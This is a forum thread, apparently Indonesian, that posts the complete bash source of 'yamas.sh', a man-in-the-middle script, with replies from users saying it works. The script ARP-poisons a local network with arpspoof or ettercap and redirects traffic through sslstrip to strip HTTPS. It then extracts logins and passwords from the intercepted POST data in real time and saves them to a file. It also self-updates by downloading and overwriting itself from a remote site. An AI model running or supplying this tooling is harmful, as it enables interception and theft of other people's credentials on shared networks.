MITM ( sniffing traffic ) yamas.sh
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\ (_) / | (___) || || || || (___) || (_____   | |   | || | /   |   ( (___) |
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   ) (   | (   ) || |   | || (   ) |      ) |   \ \_/ / |   / | |         ) |
   | |   | )   ( || )   ( || )   ( |/\____) |    \   /  |  (__) | _ /\____) )
   \_/   |/     \||/     \||/     \|\_______)     \_/   (_______)(_)\______/
===========================================================================
=       Welcome to Yet Another MITM Automation Script.                    =
=       Use this tool responsibly, and enjoy!                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-bt5                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version 0.9.3                              =
===========================================================================
Message of the day :
  If you guys like Yamas, go click the Google +1 at http://comax.fr/yamas.php !

Spoiler! :

Code:
#!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
version="0.9.3"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.

fast_cleanup() {
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ ${looparseid} != "" ]]; then kill ${looparseid}
fi
if [[ ${sslstripid} != "" ]]; then kill ${sslstripid}
fi
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
if [[ "$1" = "-e" || "$1" = "--etter" ]]; then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush             # there are probably too many resets here,
iptables --table nat --flush        # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
if [ -e '/tmp/grepcred.txt' ]; then
rm /tmp/grepcred.txt
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}

#Let's define some arguments that can be passed to the script :
if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename
    if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
    fi
clear
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
rm /tmp/grepcred.txt
exit 0
fi

if [[ "$1" = "-e" || "$1" = "--etter" ]]; then
    echo -e "\tYou will be using Ettercap instead of ARPspoof."
    sleep 0.5
fi
    
if [[ "$1" = "-h" || "$1" = "--help" ]]; then #define help message
clear
echo -e "You are running $0, version $version.


usage : $0 [-h | --help] [-p | --parse <file>]
    -h or --help  :    Display this help message, disclaimer and exit.
    
    -c or --change: Display changelog and todo.    
    -e or --etter :    Use ettercap instead of ARPspoof. One might have one's reasons...
            ARPspoof is default.
    -p or --parse :    Only parse the given <file>. Don't use wildcards.
            Use > /output_file to print to a file.
    
    
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0
fi
if [[ "$1" = "-c" || "$1" = "--change" ]]; then #Changelog
clear
echo -e "\033[31m Changelog :\033[m
Should be added in next version/revision :
- Stop ettercap without user input. (0.9.1)
- Submit your ideas !
- We're close to a final version !

Added in v0.9
- Ettercap support (with -e switch in parameters)
- Code enhancing.

Added in v0.8
- Tail-greping log file so we can be sure there is traffic being sniffed
- New parsing method from scratch : should be lighter, less CPU consuming, and most of all, outputs websites as well.
    This should be tested though to ensure maximum reliability. Please report back !
    0.8.5 : now grep from downloaded file, to allow more updates on parsing, without updating the whole script.
- New -p option to allow only parsing a file. (v0.8.5)
- More improvements.
- Catching ^C and cleanup before quitting. (v0.8.5)
- Realtime parsing menu. (V0.8.5)

\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Install sslstrip if needed.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D

\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at [email protected]"
exit
fi

### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
wget -q http://comax.fr/yamas/bt5/message -O /tmp/message
message=$(cat /tmp/message) #store it to variable
rm /tmp/message #remove temp message file

### Check for updates !
wget -q http://comax.fr/yamas/bt5/version -O /tmp/version # Get last version number
last_version=$(cat /tmp/version) #store it to variable
rm /tmp/version #remove temp version file

if [[ $last_version > $version ]] ; then # Comparing to current version
    echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)"
    read update
      if [[ $update = Y || $update = y ]] ; then
    echo "[+] Updating script..."
    wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
    chmod +x $0
    echo "[-] Script updated !"
      if [[ $0 != '/usr/bin/yamas' ]] ; then
      echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
      read install
        if [[ $install = Y || $install = y ]] ; then #do not proceed to install if using installed version : updating it already "installed" it over.
        cp $0 /usr/bin/yamas
        chmod +x /usr/bin/yamas
        echo "Script should now be installed, launching yamas !"
        sleep 3
        yamas
        exit 1
            else echo "Ok, continuing with updated version..."
      sleep 3
      $0
      exit 1
        fi
      fi
    sleep 2
    $0
    exit 1
      else echo "Ok, continuing with current version..."
      fi
else echo "No update available"
fi
### End of update process

### Install process
if [[ ! -e '/usr/bin/yamas' ]] ; then
  echo "Script is not installed. Do you want to install it ? (Y/N)"
  read install
  if [[ $install = Y || $install = y ]] ; then
    cp -v $0 /usr/bin/yamas
    chmod +x /usr/bin/yamas
    rm $0
    echo "Script should now be installed. Launching it !"
    sleep 3
    yamas
    exit 1
  else echo "Ok, not installing then !"
  fi
else echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
          _______  _______  _______  _______             _______      _____  
|\     /|(  ___  )(       )(  ___  )(  ____ \  |\     /|(  __   )    / ___ \
( \   / )| (   ) || () () || (   ) || (    \/  | )   ( || (  )  |   ( (   ) )
\ (_) / | (___) || || || || (___) || (_____   | |   | || | /   |   ( (___) |
  \   /  |  ___  || |(_)| ||  ___  |(_____  )  ( (   ) )| (/ /) |    \____  |
   ) (   | (   ) || |   | || (   ) |      ) |   \ \_/ / |   / | |         ) |
   | |   | )   ( || )   ( || )   ( |/\____) |    \   /  |  (__) | _ /\____) )
   \_/   |/     \||/     \||/     \|\_______)     \_/   (_______)(_)\______/ " # <= I love it.
echo -e "===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-bt5                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version \033[32m$version\033[m                              =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features

cleanup() {
echo
echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"

kill ${sslstripid}
kill ${looparseid}
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
if [[ "$1" = "-e" || "$1" = "--etter" ]]; then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush             # there are probably too many resets here,
iptables --table nat --flush        # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
rm /tmp/grepcred.txt

echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
    cp /tmp/$filename.txt /root/$filename.txt #moving file
    if [ -f "/root/$filename.txt" ]; then #check if it exists
        echo "Log file copied !" #it does
        else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
    fi
    else echo "Logs not saved"
fi
echo
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
    if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
        echo "Passwords saved !" #it does
        else echo "Error while saving passwords" #it does not
    fi
    else echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."

if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
    echo
    echo
    exit 1 #if yes, exit.
    else
    echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
    read -e install
        if [[ $install = "Y" || $install="y" ]] ; then
        cp ./yamas.sh /usr/bin/yamas #copy and rename script
        echo -e "\033[32m Script installed !\033[m"
        else echo "Script not installed."
        fi
    fi
exit 1
}

updatestrip() {
wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
        tar zxvf sslstrip-0.9.tar.gz
        cd sslstrip-0.9
        python ./setup.py install > /dev/null
        cd ..
        rm sslstrip-0.9.tar.gz
}

search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan () {
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}

add_target() {
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}

ascii() {
clear
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
cat /tmp/ascii
rm /tmp/ascii
final
}

tailsecure() {
xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
final
}

rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
if [ "$rtp" = "1" ] ; then
echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse
  elif [ "$rtp" = "2" ] ; then
echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse
  elif [ "$rtp" = "3" ] ; then
echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse
  elif [ "$rtp" = "4" ] ; then
echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse
  elif [ "$rtp" = "5" ] ; then
echo "Previous"
final
    else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
    rtparse
fi
}

final() {
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Tail-grep hosts through output (make sure there is traffic).
5. Real-time parsing...
6. Quit properly.

Enter the number of the desired option."
read final
if [ "$final" = "1" ] ; then
  rescan
  elif [ "$final" = "2" ] ; then
  add_target
  elif [ "$final" = "3" ] ; then
  ascii
  elif [ "$final" = "4" ] ; then
  tailsecure
  elif [ "$final" = "5" ] ; then
  rtparse
  elif [ "$final" = "6" ] ; then
  cleanup
    else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
    final
fi
}

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31m [+] Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ] ; then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ] ; then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo  "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ] ; then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
#### BEGIN of update process ####
if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
    sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
    if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
    echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
version ? [Y/N]
Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
should be safe to use though."
    read -e sslupdate
        if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
    updatestrip
        sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
            if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
              else echo "\033[33mOops, install failed.\033[m Continuing with current version."
            fi
        else echo "All right, continuing with current version."
        fi
     elif [[ $sslversion = "0.9" ]]; then
     echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
    fi
    sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
    sleep 3
#### END of update process ####


elif [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
sslversion=$(cat /pentest/web/sslstrip/sslstrip.py | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
    if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
    echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
    read -e sslupdate
        if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
    updatestrip
        sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
            if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
            sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
            sleep 3
              else echo "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
              /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
        sleep 3
            fi
        else echo "All right, continuing with current, non-installed version."
        /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
        sleep 3
        fi
    fi

#output log to temp file
elif [ -e '/pentest/web/sslstrip/sslstrip.py' ]; then
            echo "Sslstrip was found, but not installed and not executable. Making it executable... (not
installing)"
            chmod +x '/pentest/web/sslstrip/sslstrip.py'
            if [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
            echo "Now it is. Continuing..."
                /pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null &
                sleep 3
sslstripid=$! #output log to temp file
            fi
else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
installed.
You can download BT4r2 version of this script at http://tinyurl.com/mitm-yamas. To install sslstrip use
apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
read apti
  if [[ $apti = "Y" || $apti = "y" ]] ; then
  apt-get install sslstrip
  exit 1
  fi    
fi
sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo

#Arpspoofing
echo
echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 2) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 2) { print $5}')
gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ] ; then
gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ] ; then
iface=$(ip route show | awk '(NR == 2) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo

if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
echo
echo -e "Do you want to map the network to show live hosts? (Y/N)    [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
    if [[ $hosts = "Y" || $hosts = "y" ]] ; then
    nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
    echo -e "\033[m " # switch color back to white
    else echo -e "\033[m "
    fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3.
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp  /$1/ /$gateway/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
echo "Enter IP adresse(s). Usage : IP1 IP2 IP3..."
read -e parameters
    if [[ "$1" = "-e" || "$1" = "--etter" ]]; then
    ettercapi $parameters
    else
    arpspoofi $parameters
    fi

else
      if [[ "$1" = "-e" || "$1" = "--etter" ]]; then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp  // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
      else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
      fi
fi

echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"

echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
while :
do
    clear
    echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
    cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
  }
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.


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#2
ane lagi nyoba nih bro script diatas dan lagi running sambil posting disini........

hasilnya ga berhasil nih script capture pass dan user mungkin harus di WLAN cause ane sekarang pake LAN.


#3
wih sama seperti
http://forum.id-backtrack.com/showthread.php?tid=438
tapi kenapa pas di scriptnya k4it0 kog mesti update ya om?
Sedangkan di om, gak perlu.....

Dan worknya juga, punya om work.. yg k4it0 gak work...
Suram
Yang putih, yang seharusnya ber-aksi dan berbakat!
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#4
work bro .. thx

#5
enak pake ginian seolah udah dipandu sama perintahnya
root@IBTeam# loe.gw ^C

#6
yamas work 100 persen

#7
Nyoba dulu ah Smile
Yang putih, yang seharusnya ber-aksi dan berbakat!
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#8
Petunjuk untuk Backtrack 5
Monggo disimak Smile
root@IBTeam# loe.gw ^C

#9
btw yang bikin om videonya ? klo om yang bikin minta mentahan nya dong.. mau di pasang di halaman depan .. thx

#10
(10-18-2011, 04:06 PM)cassaprodigy Wrote: btw yang bikin om videonya ? klo om yang bikin minta mentahan nya dong.. mau di pasang di halaman depan .. thx

Kali ini bukan aku, lg libur
Berdasar judul mungkin ini dari creator yamas-nya Smile
Lagipula video tutorialku yg dulu juga belum masuk halaman depan kan?
root@IBTeam# loe.gw ^C






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